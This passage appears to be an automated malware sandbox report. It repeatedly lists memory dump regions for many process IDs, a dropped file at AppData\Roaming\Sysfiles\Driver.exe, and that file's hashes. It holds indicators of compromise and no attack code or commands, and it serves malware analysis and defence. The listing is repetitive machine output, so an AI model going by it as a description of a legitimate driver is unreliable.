| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/1704-182-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/1192-184-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/1192-187-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/284-188-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/284-191-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/1560-192-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/1560-195-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/1540-196-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/1540-199-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/1200-200-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/1200-203-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/1968-204-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/1968-207-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/972-208-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/972-211-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/1232-212-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/1232-215-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/2036-216-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/2036-219-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/1384-220-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/1384-223-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/1704-224-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/1524-225-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/1524-228-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/1296-229-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/1296-232-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/824-233-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/824-236-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/1124-237-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/1124-240-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/876-241-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/876-244-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/672-245-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/672-248-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/608-249-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/608-252-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/972-253-0x0000000140000000-0x0000000140B75000-memory.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/1748-254-0x0000000000000000-mapping.dmp
memory/1748-257-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/840-258-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/840-261-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/1876-262-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/1876-265-0x0000000140000000-0x0000000140B75000-memory.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/1428-266-0x0000000000000000-mapping.dmp
memory/1428-269-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/1560-270-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/1560-273-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/1688-274-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/1688-277-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/1600-278-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/1600-281-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/1572-282-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/1572-285-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/364-286-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/364-289-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/2040-290-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/2040-293-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/824-294-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/332-298-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/1104-302-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/1532-306-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/1152-310-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/1076-314-0x0000000000000000-mapping.dmp